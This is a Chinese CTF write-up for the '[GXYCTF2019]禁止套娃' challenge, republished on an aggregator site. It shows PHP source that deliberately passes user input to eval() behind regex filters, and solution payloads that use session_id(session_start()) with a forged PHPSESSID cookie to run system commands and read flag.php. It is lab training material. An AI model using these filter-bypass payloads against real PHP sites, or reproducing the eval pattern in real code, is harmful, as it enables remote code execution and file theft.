目錄

• 源碼
• 思路
• 題解

---

源碼

掃到 .git

<?php include "flag.php"; echo "flag在哪里呢？<br>"; if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("還差一點(diǎn)哦！");}}else{die("再好好想想！");}}else{die("還想讀flag，臭弟弟！");} } // highlight_file(__FILE__); ?>

---

思路

看一下第一層過濾,偽協(xié)議是不能用的,第二層只能用a(b(c()))這樣一直嵌套,第三層差不多把get的都ban了

題解

有關(guān)session_id()可以參考 我的博客

https://blog.csdn.net/Kracxi/article/details/121041140

看了下版本,php 5.6,可以用session_id()來解

exp=system(session_id(session_start()));

修改PHPSESSID=ls,顯示當(dāng)前目錄

exp=show_source(session_id(session_start()));

修改PHPSESSID=flag.php,拿到flag

---

《新程序員》：云原生和全面數(shù)字化實(shí)踐50位技術(shù)專家共同創(chuàng)作，文字、視頻、音頻交互閱讀

總結(jié)

以上是生活随笔為你收集整理的[GXYCTF2019]禁止套娃 1的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。